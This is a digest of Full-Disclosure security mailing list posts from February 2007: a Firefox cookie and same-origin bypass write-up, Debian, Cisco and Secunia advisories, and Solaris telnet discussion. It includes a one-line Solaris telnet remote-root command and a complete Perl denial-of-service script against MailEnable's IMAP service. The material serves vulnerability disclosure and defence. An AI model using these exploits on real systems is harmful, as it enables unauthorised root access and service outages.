Re: [Full-disclosure] Firefox: serious cookie stealing / same-domain bypass vulnerability

2007-02-14 Thread James Matthews

Great i cannot wait!

On 2/14/07, Daniel Veditz <[EMAIL PROTECTED]> wrote:


Peter Besenbruch wrote:
> Ben Bucksch wrote:
>> https://bugzilla.mozilla.org/show_bug.cgi?id=370445
>
> Are we going to see a version 2.0.0.2 of Firefox soon? With all the
> Firefox bugs, we are about due.

A 2.0.0.2 is in progress
http://weblogs.mozillazine.org/qa/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/





--
http://www.goldwatches.com/watches.asp?Brand=39
http://www.wazoozle.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Firefox: serious cookie stealing / same-domain bypass vulnerability

2007-02-14 Thread Daniel Veditz
Peter Besenbruch wrote:
> Ben Bucksch wrote:
>> https://bugzilla.mozilla.org/show_bug.cgi?id=370445
> 
> Are we going to see a version 2.0.0.2 of Firefox soon? With all the 
> Firefox bugs, we are about due.

A 2.0.0.2 is in progress
http://weblogs.mozillazine.org/qa/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Firefox: serious cookie stealing / same-domain bypass vulnerability

2007-02-14 Thread Peter Besenbruch
Ben Bucksch wrote:
> https://bugzilla.mozilla.org/show_bug.cgi?id=370445
> 
> ___
> Full-Disclosure - We believe in it.


Hi Ben,

Are we going to see a version 2.0.0.2 of Firefox soon? With all the 
Firefox bugs, we are about due.


-- 
Hawaiian Astronomical Society: http://www.hawastsoc.org
HAS Deepsky Atlas: http://www.hawastsoc.org/deepsky

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Firefox: serious cookie stealing / same-domain bypass vulnerability

2007-02-14 Thread Ben Bucksch
https://bugzilla.mozilla.org/show_bug.cgi?id=370445

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Firefox: serious cookie stealing / same-domain bypass vulnerability

2007-02-14 Thread Michal Zalewski
There is a serious vulnerability in Mozilla Firefox, tested with 2.0.0.1,
but quite certainly affecting all recent versions.

The problem lies in how Firefox handles writes to the 'location.hostname'
DOM property. It is possible for a script to set it to values that would
not otherwise be accepted as a hostname when parsing a regular URL -
including a string containing \x00.

Doing this prompts a peculiar behavior: internally, DOM string variables
are not NUL-terminated, and as such, most of checks will consider
'evil.com\x00foo.example.com' to be a part of *.example.com domain. The
DNS resolver, however, and much of the remaining browser code, operates on
ASCIZ strings native to C/C++ instead, treating the aforementioned example
as 'evil.com'.

This makes it possible for evil.com to modify location.hostname as
described above, and have the resulting HTTP request still sent to
evil.com. Once the new page is loaded, the attacker will be able to set
cookies for *.example.com; he'll be also able to alter document.domain
accordingly, in order to bypass the same-origin policy for XMLHttpRequest
and cross-frame / cross-window data access.

A quick demonstration is available here:

  http://lcamtuf.dione.cc/ffhostname.html

If you want to confirm a successful exploitation, check Tools -> Options
-> Privacy -> Show Cookies... for coredump.cx after the test; for the demo
to succeed, the browser needs to have Javascript enabled, and must accept
session cookies.

The impact is quite severe: malicious sites can manipulate authentication
cookies for third-party webpages, and, by the virtue of bypassing
same-origin policy, can possibly tamper with the way these sites are
displayed or how they work.

Regards,
/mz
http://lcamtuf.coredump.cx/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [SECURITY] [DSA 1260-1] New imagemagick package fix arbitrary code execution

2007-02-14 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 1260-1[EMAIL PROTECTED]
http://www.debian.org/security/ Moritz Muehlenhoff
February 14th, 2007 http://www.debian.org/security/faq
- --

Package: imagemagick
Vulnerability  : buffer overflow
Problem-Type   : local(remote)
Debian-specific: no
CVE ID : CVE-2007-0770

Vladimir Nadvornik discovered that the fix for a vulnerability in the
PALM decoder of Imagemagick, a collection of image manipulation programs,
was ineffective. To avoid confusion a new CVE ID has been assigned;
tha original issue was tracked as CVE-2006-5456.

For the stable distribution (sarge) this problem has been fixed in
version 6:6.0.6.2-2.9.

For the upcoming stable distribution (etch) this problem has been
fixed in version 7:6.2.4.5.dfsg1-0.14.

For the unstable distribution (sid) this problems has been fixed in
version 7:6.2.4.5.dfsg1-0.14.

We recommend that you upgrade your imagemagick packages.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- 

  Source archives:


http://security.debian.org/pool/updates/main/i/imagemagick/imagemagick_6.0.6.2-2.9.dsc
  Size/MD5 checksum:  881 7a9c72b09064a000b21fb7f1c188f58b

http://security.debian.org/pool/updates/main/i/imagemagick/imagemagick_6.0.6.2-2.9.diff.gz
  Size/MD5 checksum:   142091 882c6b166d02a3afcf7b65b935053141

http://security.debian.org/pool/updates/main/i/imagemagick/imagemagick_6.0.6.2.orig.tar.gz
  Size/MD5 checksum:  6824001 477a361ba0154cc2423726fab4a3f57c

  Alpha architecture:


http://security.debian.org/pool/updates/main/i/imagemagick/imagemagick_6.0.6.2-2.9_alpha.deb
  Size/MD5 checksum:  1473132 a64722b75a6727372eab8c5a8e9d3460

http://security.debian.org/pool/updates/main/i/imagemagick/libmagick++6_6.0.6.2-2.9_alpha.deb
  Size/MD5 checksum:   173936 73ad6aba77ddd80a1fa1bf9cb6838a6a

http://security.debian.org/pool/updates/main/i/imagemagick/libmagick++6-dev_6.0.6.2-2.9_alpha.deb
  Size/MD5 checksum:   288822 6a29717cdc16bc5f7dc3527b3c04a32e

http://security.debian.org/pool/updates/main/i/imagemagick/libmagick6_6.0.6.2-2.9_alpha.deb
  Size/MD5 checksum:  1284370 7fe43e1953d01bfd1f40e743b43828e5

http://security.debian.org/pool/updates/main/i/imagemagick/libmagick6-dev_6.0.6.2-2.9_alpha.deb
  Size/MD5 checksum:  2200348 183f4d885fb0f0aa298f80ae689eb068

http://security.debian.org/pool/updates/main/i/imagemagick/perlmagick_6.0.6.2-2.9_alpha.deb
  Size/MD5 checksum:   234798 1e536b98cce30203535a21a110effc66

  AMD64 architecture:


http://security.debian.org/pool/updates/main/i/imagemagick/imagemagick_6.0.6.2-2.9_amd64.deb
  Size/MD5 checksum:  1466442 cce61a586a2c5456e5cd9998f503dff1

http://security.debian.org/pool/updates/main/i/imagemagick/libmagick++6_6.0.6.2-2.9_amd64.deb
  Size/MD5 checksum:   163710 f0c6e48b31063d20aad8d6801f7b01dd

http://security.debian.org/pool/updates/main/i/imagemagick/libmagick++6-dev_6.0.6.2-2.9_amd64.deb
  Size/MD5 checksum:   228834 c0e8f73804537f75df7260ff692e0cb6

http://security.debian.org/pool/updates/main/i/imagemagick/libmagick6_6.0.6.2-2.9_amd64.deb
  Size/MD5 checksum:  1195150 0162e13544100058faee672fd672bcfd

http://security.debian.org/pool/updates/main/i/imagemagick/libmagick6-dev_6.0.6.2-2.9_amd64.deb
  Size/MD5 checksum:  1550468 07ae791a2fbccd31ea48bb425552308f

http://security.debian.org/pool/updates/main/i/imagemagick/perlmagick_6.0.6.2-2.9_amd64.deb
  Size/MD5 checksum:   231912 ffe6aa0bc71cb5b1f367864fd94c9c0c

  ARM architecture:


http://security.debian.org/pool/updates/main/i/imagemagick/imagemagick_6.0.6.2-2.9_arm.deb
  Size/MD5 checksum:  1466166 7a8b57092ad8fcb15ff9ac69e94f79a6

http://security.debian.org/pool/updates/main/i/imagemagick/libmagick++6_6.0.6.2-2.9_arm.deb
  Size/MD5 checksum:   149436 f60d0449d25c294c8a9e5b111ee0dd73

http://security.debian.org/pool/updates/main/i/imagemagick/libmagick++6-dev_6.0.6.2-2.9_arm.deb
  Size/MD5 checksum:   234946 fc0b7d343929740700a12af92014f7b7

http://security.debian.org/pool/updates/main/i/imagemagick/libmagick6_6.0.6.2-2.9_arm.deb
  Size/MD5 checksum:  1204686 888ae3ff5955c8d4ba9635d2b057

http://security.debian.org/pool/updates/main/i/image

[Full-disclosure] [SECURITY] [DSA 1259-1] New fetchmail packages fix information disclosure

2007-02-14 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 1259-1[EMAIL PROTECTED]
http://www.debian.org/security/ Moritz Muehlenhoff
February 14th, 2007 http://www.debian.org/security/faq
- --

Package: fetchmail
Vulnerability  : programming error
Problem-Type   : remote
Debian-specific: no
CVE ID : CVE-2006-5867

Isaac Wilcox discovered that fetchmail, a popular mail retrieval and
forwarding utility, insufficiently enforces encryption of connections,
which might lead to information disclosure.

For the stable distribution (sarge) this problem has been fixed in
version 6.2.5-12sarge5.

For the upcoming stable distribution (etch) this problem has been
fixed in version 6.3.6~rc5-1.

For the unstable distribution (sid) this problem has been fixed in
version 6.3.6~rc5-1.

We recommend that you upgrade your fetchmail package.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- 

  Source archives:


http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge5.dsc
  Size/MD5 checksum:  650 6f33289df330ad5d6b73a970a131717d

http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge5.diff.gz
  Size/MD5 checksum:   155433 092b1d26d52b001b85b5afb66936fe90

http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5.orig.tar.gz
  Size/MD5 checksum:  1257376 9956b30139edaa4f5f77c4d0dbd80225

  Architecture independent components:


http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail-ssl_6.2.5-12sarge5_all.deb
  Size/MD5 checksum:42390 da1c1f925e68bf2385b071648db81f66

http://security.debian.org/pool/updates/main/f/fetchmail/fetchmailconf_6.2.5-12sarge5_all.deb
  Size/MD5 checksum:   101492 2afde54d68ae7174551613028c91403d

  Alpha architecture:


http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge5_alpha.deb
  Size/MD5 checksum:   573554 69b08d3a3471630a9a844da3cf2389c9

  AMD64 architecture:


http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge5_amd64.deb
  Size/MD5 checksum:   556356 2411990fef9d0a6a9ee41db1c33afad2

  ARM architecture:


http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge5_arm.deb
  Size/MD5 checksum:   549686 5daedcf04842d2e5b540e88f70235ff4

  HP Precision architecture:


http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge5_hppa.deb
  Size/MD5 checksum:   562170 b0ef556bf0a065dd545b1381394d32c3

  Intel IA-32 architecture:


http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge5_i386.deb
  Size/MD5 checksum:   548738 6fc67ff75514e65d15c1ccd78f471046

  Intel IA-64 architecture:


http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge5_ia64.deb
  Size/MD5 checksum:   597726 4d3cb4897d0c4b410962a7694c711647

  Motorola 680x0 architecture:


http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge5_m68k.deb
  Size/MD5 checksum:   538548 84679550a984c949b8869d4b385fa815

  Big endian MIPS architecture:


http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge5_mips.deb
  Size/MD5 checksum:   557342 916d92cfc83e97bccd112408b78261cb

  Little endian MIPS architecture:


http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge5_mipsel.deb
  Size/MD5 checksum:   557230 566a25f4fa247d9d1cebc37a3daee6c7

  PowerPC architecture:


http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge5_powerpc.deb
  Size/MD5 checksum:   556706 0ac0f73bbe90d13bf73b054da7187da2

  IBM S/390 architecture:


http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge5_s390.deb
  Size/MD5 checksum:   555180 fd69f70a49c73046cd1c265e3b1fd80d

  Sun Sparc architecture:


http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge5_sparc.deb
  Size/MD5 checksum:   549578 28ca03faddd6b6ff3958243012e681a4


  These files will probably be moved into the stable distribution on
  its next update.

- 
-
For apt-get: deb http://security

Re: [Full-disclosure] Solaris telnet vulnberability - how many on your network?

2007-02-14 Thread Rodrigo Barbosa
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

On Mon, Feb 12, 2007 at 12:00:30AM -0600, Gadi Evron wrote:
> Johannes Ullrich from the SANS ISC sent this to me and then I saw it on
> the DSHIELD list:
> 
> 
> If you run Solaris, please check if you got telnet enabled NOW. If you
> can, block port 23 at your perimeter. There is a fairly trivial
> Solaris telnet 0-day.
> 
> telnet -l "-froot" [hostname]
> 
> will give you root on many Solaris systems with default installs
> We are still testing. Please use our contact form at
> https://isc.sans.org/contact.html
> if you have any details about the use of this exploit.
> 

- -l -froot ? Wow. We used to have bad bug on AIX, back in 1995 or so.
It was long fixed. If I recall correctly, it was also present on SunOS,
or maybe Solaris 1 or 2, but I'm not sure of anything but AIX.

[]s

- -- 
Rodrigo Barbosa
"Quid quid Latine dictum sit, altum viditur"
"Be excellent to each other ..." - Bill & Ted (Wyld Stallyns)

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.5 (GNU/Linux)

iD8DBQFF02xlpdyWzQ5b5ckRAvn4AJ4/iugzlRRWBOuX+L28SYcizu/40QCgsxG9
V6Zi1d13THRoJ9Sl4lugfq8=
=rB7s
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [ALERT] CLICK HERE TO PARTY [ALERT]

2007-02-14 Thread Christopher Abad
full disclosure, beware, im going to take this opportunity to spam you,
not far from the normal posting standard of this list, so here goes.
im opening an art gallery downtown san francisco and the first opening
reception is this weekend.  if you are in the bay area it would be cool
if you came by and checked it out.

20 GOTO 10 presents "HELLO WORLD," our very first tiny little opening
reception and grand opening with works from alexis mackenzie, mindy datema,
aempirei and asm.

saturday, february 17, 2007 7-11PM

20 GOTO 10
679 geary st.
san francisco ca 94102

http://www.twentygoto10.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Solaris telnet vulnberability - how many on your network?

2007-02-14 Thread v3dt3n

From: "Ham Beast" <[EMAIL PROTECTED]>

seriously why the fuck is 10 email on the telnet of the solaris with
worthless content by gadi enron in mine inbox?



I could be wrong, but I strongly suspect the reason to be someone exploiting
the grok.org.uk with the 'full-disclosure' ID and mass-mailing every mail
sent to that address to those who are present in the "fd-request" ID's
addressbook. My mailbox too has been bombarded with all kinds of hacker
stuff, including the antics of this real funny n3tty dude. Let me know if
you want to see them, I could forward 'em to you.

Regards
v3dt3n
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Sample Packet Captures

2007-02-14 Thread H D Moore
It might be more effective to contribute to the Wireshark Wiki:
 - http://wiki.wireshark.org/SampleCaptures

-HD

On Wednesday 14 February 2007 11:17, crazy frog crazy frog wrote:
> As it is not possible for everyone to setup different networks
> quickly,I am thinking to start a wiki which will contain various
> packet captures .It will help people in quickly getting the required
> dump for analysis/refrence purpose. I have started a wiki here:-
> http://secgeeks.com/packetland
> i would like to hear your feedback regarding this.feel free to upload
> any packet dump you might have.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Sample Packet Captures

2007-02-14 Thread crazy frog crazy frog
Hi All,

As it is not possible for everyone to setup different networks
quickly,I am thinking to start a wiki which will contain various
packet captures .It will help people in quickly getting the required
dump for analysis/refrence purpose. I have started a wiki here:-
http://secgeeks.com/packetland
i would like to hear your feedback regarding this.feel free to upload
any packet dump you might have.

Regards,
_CF
---
http://www.secgeeks.com
get a blog on secgeeks :)
register here:-
http://secgeeks.com/user/register
rss feeds :-
http://secgeeks.com/node/feed
Submit you security articles,send them to [EMAIL PROTECTED]

http://www.newskicks.com
Submit and kick for new stories from all around the world.
---

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] MailEnable DoS POC-2

2007-02-14 Thread mu-b
This version will work on the latest MailEnable v2.37..

Symantec seem to think this is the same issue as BID 20290, but it is
in fact, completely different... and somewhat unpatched..
---
([EMAIL PROTECTED])

#!/usr/bin/perl
#
# maildisable-v7.pl
#
# Mail Enable Professional/Enterprise v2.32-7 (win32)
# by mu-b - Wed Feb 14 2007
#
# - Tested on: Mail Enable Professional v2.37 (win32)
#


use Getopt::Std; getopts('t:', \%arg);
use Socket;
use MIME::Base64;

&print_header;

my $target;

if (defined($arg{'t'})) { $target = $arg{'t'} }
if (!(defined($target))) { &usage; }

my $imapd_port = 143;
my $send_delay = 2;

my $PAD = 'A';

if (connect_host($target, $imapd_port)) {
print("-> * Connected\n");
send(SOCKET, "1 AUTHENTICATE NTLM\r\n", 0);
sleep($send_delay);

$buf = ($PAD x 12).
   "\xfa\xff\xff\xff".
   ($PAD x 12);
send(SOCKET, encode_base64($buf)."\r\n", 0);
sleep($send_delay);

$buf = ($PAD x 28).
   "\x00\x01".
   ($PAD x 2).
   "\xff\xff\xff\x7f";
send(SOCKET, encode_base64($buf)."\r\n", 0);
sleep($send_delay);

print("-> * Successfully sent payload!\n");
}

sub print_header {
print("MailEnable Pro v2.37 DoS POC\n");
print("by: <[EMAIL PROTECTED]>\n\n");
}

sub usage {
print(qq(Usage: $0 -t 

 -t : hostname to test
));

exit(1);
}

sub connect_host {
($target, $port) = @_;
$iaddr  = inet_aton($target) || die("Error: $!\n");
$paddr  = sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto  = getprotobyname('tcp')  || die("Error: $!\n");

socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr)  || die("Error: $!\n");
return(1338);
}
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Cisco Security Advisory: Multiple Vulnerabilities in Firewall Services Module

2007-02-14 Thread Cisco Systems Product Security Incident Response Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


Cisco Security Advisory: 
Multiple Vulnerabilities in Firewall Services Module

Advisory ID: cisco-sa-20070214-fwsm

http://www.cisco.com/warp/public/707/cisco-sa-20070214-fwsm.shtml

Revision 1.0

For Public Release 2007 February 14 1600 UTC (GMT)

- ---

Summary
===

Multiple vulnerabilities exist in the Cisco Firewall Services Module
(FWSM). These vulnerabilities occur in the processing of specific
Hypertext Transfer Protocol (HTTP), Secure HTTP (HTTPS), Session
Initiation Protocol (SIP), and Simple Network Management Protocol
(SNMP) traffic. If verbose logging is enabled for debugging purposes, a
vulnerability exists when the FWSM processes packets destined to
itself. All of these vulnerabilities may result in a reload of the
device.

An additional vulnerability is included in this advisory in which the
manipulation of access control lists (ACLs) that make use of object
groups may corrupt the ACL and create a situation where unwanted
traffic may be permitted or desirable traffic may be blocked.

These vulnerabilities are independent of each other; a release that is
affected by one vulnerability is not necessarily affected by the
others.

There are workarounds for some of the vulnerabilities disclosed in this
advisory.

Cisco has made free software available to address this issue for
affected customers.

This advisory is posted at 
http://www.cisco.com/warp/public/707/cisco-sa-20070214-fwsm.shtml

Affected Products
=

The vulnerabilities described in this document
apply to the FWSM. The companion advisory
http://www.cisco.com/warp/public/707/cisco-sa-20070214-pix.shtml
contains information about similar vulnerabilities that affect the
Cisco PIX 500 Series Security Appliances and the Cisco ASA 5500 Series
Adaptive Security Appliances.

Vulnerable Products
+--

The following table indicates which software releases for the Cisco
FWSM are affected and under what conditions:

+-+
| Vulnerability | Only affected  | Vulnerable | Versions | Cisco Bug  |
| Name  | if...  | by | affected | ID |
|   ||  default?  |  ||
|---+++--+|
|   | Enhanced   ||  ||
| 1. Enhanced   | inspection of  || All 3.x  ||
| Inspection of | HTTP traffic   || software ||
| Malformed | is enabled | No | releases | CSCsd75794 |
| HTTP Traffic  | through the|| prior to ||
| May Cause | command|| 3.1  ||
| Reload| "inspect http  || (3.24)   ||
|   | "   ||  ||
|---+++--+|
|   | SIP inspection ||  ||
|   | is enabled || All  ||
|   | through the|| software ||
|   | command "fixup || releases ||
| 2. Inspection | protocol sip"  || prior to ||
| of Malformed  | (in FWSM   | Yes for| 2.3  ||
| SIP Messages  | software 2.x   | 2.x and no | (4.12)   | CSCsg80915 |
| May Cause | and before) or | for 3.x| and all  ||
| Reload| through the|| 3.x  ||
|   | command|| releases ||
|   | "inspect sip"  || prior to ||
|   | (in FWSM   || 3.1  ||
|   | software 3.x   || (3.24)   ||
|   | and later) ||  ||
|---+++--+|
|   | Logging at ||  ||
|   | "debugging"||  ||
| 3. Processing | level  || All 3.x  ||
| of Packets| (regardless of || software ||
| Destined to   | the logging| No | releases | CSCse85707 |
| the FWSM May  | destination)   || prior to ||
| Cause Reload  | and syslog || 3.1(3.3) ||
|   | message 710006 ||  ||
|   | is enabled ||  ||
|---+++--+|
|   | Network access ||  |  

[Full-disclosure] Cisco Security Advisory: Multiple Vulnerabilities in Cisco PIX and ASA Appliances

2007-02-14 Thread Cisco Systems Product Security Incident Response Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


Cisco Security Advisory: 
Multiple Vulnerabilities in Cisco PIX and ASA Appliances

Advisory ID: cisco-sa-20070214-pix

http://www.cisco.com/warp/public/707/cisco-sa-20070214-pix.shtml

Revision 1.0

For Public Release 2007 February 14 1600 UTC (GMT)

- ---

Summary
===

Multiple vulnerabilities are found in Cisco PIX 500 Series Security
Appliances and the Cisco ASA 5500 Series Adaptive Security Appliances.
They affect the following:

  * Enhanced inspection of Malformed Hypertext Transfer Protocol (HTTP)
traffic
  * Inspection of malformed Session Initiation Protocol (SIP) packets
  * Inspection of a stream of malformed Transmission Control Protocol
(TCP) packets
  * Privilege escalation

Vulnerabilities are independent of each other. If a vulnerability
affects a device, it does not necessarily mean that the device is
affected by all of them.

This advisory is posted at 
http://www.cisco.com/warp/public/707/cisco-sa-20070214-pix.shtml.

Affected Products
=

In addition to the Cisco PIX 500 Series Security Appliances and the
Cisco ASA 5500 Series Adaptive Security Appliances, some
vulnerabilities also affect Cisco Firewall Services Module (FWSM). More
information regarding FWSM can be found in the companion advisory 
http://www.cisco.com/warp/public/707/cisco-sa-20070214-fwsm.shtml.

Vulnerable Products
+--

The following software releases for Cisco PIX and ASA Security
Appliances are affected:

+-+
| Vulnerability | Only affected  | Vulnerable | Versions | Cisco Bug  |
| Name  | if...  | by | affected | ID |
|   ||  default?  |  ||
|---+++--+|
|   | Enhanced   || Only 7.x ||
|   | inspection of  || software ||
| Enhanced  | HTTP traffic   || releases ||
| inspection of | is enabled via | No | prior to | CSCsd75794 |
| Malformed | the command|| 7.0  ||
| HTTP traffic  | "inspect http  || (4.14)   ||
|   | "   || and 7.1  ||
|   ||| (2.1)||
|---+++--+|
|   ||| For 6.x  ||
|   ||| software ||
|   ||| all  ||
|   ||| releases ||
|   ||| prior to ||
|   ||| 6.3  ||
|   ||| (5.115), ||
|   ||| for  ||
|   | SIP inspection | No for 7.x | 7.0.x||
| Inspection of | is enabled via | releases   | software | CSCse27708 |
| malformed SIP | the command| Yes for| all  | and|
| packets   | "fixup | 6.x| releases | CSCsd97077 |
|   | protocol sip"  | releases   | prior to ||
|   | or || 7.0  ||
|   | "inspect sip"  || (5.2),   ||
|   ||| and for  ||
|   ||| 7.1.x||
|   ||| software ||
|   ||| all  ||
|   ||| releases ||
|   ||| prior to ||
|   ||| 7.1(2.5) ||
|---+++--+|
|   | TCP-based  ||  ||
| Inspection of | protocol   || Only ||
| a stream of   | inspection is  || 7.2.2||
| malformed TCP | enabled, for   | Yes| software | CSCsh12711 |
| packets   | example|| release  ||
|   | "inspect ftp"  ||  ||
|   | or ||  ||
|   | "inspect http" ||  ||
|---+++--+|
|   | If LOCAL   || Only | 

[Full-disclosure] (no subject)

2007-02-14 Thread j0F
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Solaris telnet vulnberability - how many onyour network?

2007-02-14 Thread David Taylor
A patch has been released.

http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1


==
David Taylor //Sr. Information Security Specialist
University of Pennsylvania Information Security 
Philadelphia PA USA
(215) 898-1236
http://www.upenn.edu/computing/security/
== 


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Joe Shamblin
Sent: Tuesday, February 13, 2007 7:17 PM
To: [EMAIL PROTECTED]
Cc: Oliver Friedrichs; bugtraq@securityfocus.com;
full-disclosure@lists.grok.org.uk; Gadi Evron
Subject: Re: [Full-disclosure] Solaris telnet vulnberability - how many
onyour network?


[EMAIL PROTECTED] wrote:
>> On Tue, 13 Feb 2007 [EMAIL PROTECTED] wrote:
 On Tue, 13 Feb 2007 [EMAIL PROTECTED] wrote:
>> Am I missing something?  This vulnerability is close to 10 years old.
>> It was in one of the first versions of Solaris after Sun moved off of
>> the SunOS BSD platform and over to SysV.  It has specifically to do
w=
>> ith
>> how arguments are processed via getopt() if I recall correctly.
> You're confused with AIX/Linux
>
> Solaris did not have the -f option in login until much later.
 Hi Casper. While we have you here, any idea on when Sun will be
patching
 this issue?
>>> Now, follow the links from http://sunsolve.sun.com/tpatches
>>>
>>> Casper
>>>
>> Many thanks Casper! Can you give some more information on exactly what is
>> patched. Any Sun released advisory?
> 
> 
> The simplest possible fix on such short notice:
> 
>
http://cvs.opensolaris.org/source/diff/onnv/onnv-gate/usr/src/cmd/cmd-inet/u
sr.sbin/in.telnetd.c?r2=3629&r1=2923
> 
> Casper


How about just uncommenting the following from /etc/default/login

# If CONSOLE is set, root can only login on that device.
# Comment this line out to allow remote login by root.
#
CONSOLE=/dev/console

Not a fix to be sure, but at least prevents a remote login.

Joe
-- 
Joe Shamblin[EMAIL PROTECTED]
Senior Systems Administrator Department of Computer Science
(919) 660-6582  Duke University

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Secunia Research: MailEnable Web Mail Client Multiple Vulnerabilities

2007-02-14 Thread Secunia Research
== 

 Secunia Research 14/02/2007

   - MailEnable Web Mail Client Multiple Vulnerabilities -

== 
Table of Contents

Affected Software1
Severity.2
Vendor's Description of Software.3
Description of Vulnerability.4
Solution.5
Time Table...6
Credits..7
References...8
About Secunia9
Verification10

== 
1) Affected Software 

* MailEnable Professional Edition 2.351

NOTE: Other versions may also be affected.

== 
2) Severity 

Rating: Moderately Critical
Impact: Cross-site scripting
Where:  From Remote

== 
3) Vendor's Description of Software

"MailEnable's mail server software provides a powerful, scalable hosted
messaging platform for Microsoft Windows. MailEnable offers stability,
unsurpassed flexibility and an extensive feature set which allows you
to provide cost-effective mail services."

Product Link:
http://www.mailenable.com/default.asp

== 
4) Description of Vulnerability

Secunia Research has discovered some vulnerabilities in MailEnable Web
Mail Client, which can be exploited by malicious people to conduct
cross-site scripting, cross-site request forgery, and script insertion
attacks.

1) Scripts in email messages are not properly sanitised before being
displayed in the email message. This can be exploited to insert
arbitrary HTML and script code, which is executed in a user's browser
session in context of an affected site when a user views a specially
crafted email message.

2) Input passed to the "ID" parameter in
mewebmail/base/default/lang/EN/right.asp,
mewebmail/base/default/lang/EN/Forms/MAI/list.asp, and
mewebmail/base/default/lang/EN/Forms/VCF/list.asp is not properly
sanitised before being returned to the user. This can be exploited to
execute arbitrary HTML and script code in a user's browser session in
context of an affected site.

Successful exploitation requires that the target user is logged in.

3) The application allows users to send messages via HTTP requests
without performing any validity checks to verify the request. This can
be exploited to change a user's settings by e.g. tricking a target user
into visiting a malicious website.

== 
5) Solution 

Update to the latest version.
http://www.mailenable.com/download.asp

== 
6) Time Table 

06/02/2007 - Vendor notified.
06/02/2007 - Vendor response.
13/02/2007 - Request for status update.
13/02/2007 - Vendor response with fix information.
14/02/2007 - Public disclosure.

== 
7) Credits 

Discovered by JJ Reyes, Secunia Research.

== 
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
the following CVE identifiers:
* CVE-2007-0651 (XSS)
* CVE-2007-0652 (CSRF)

== 
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
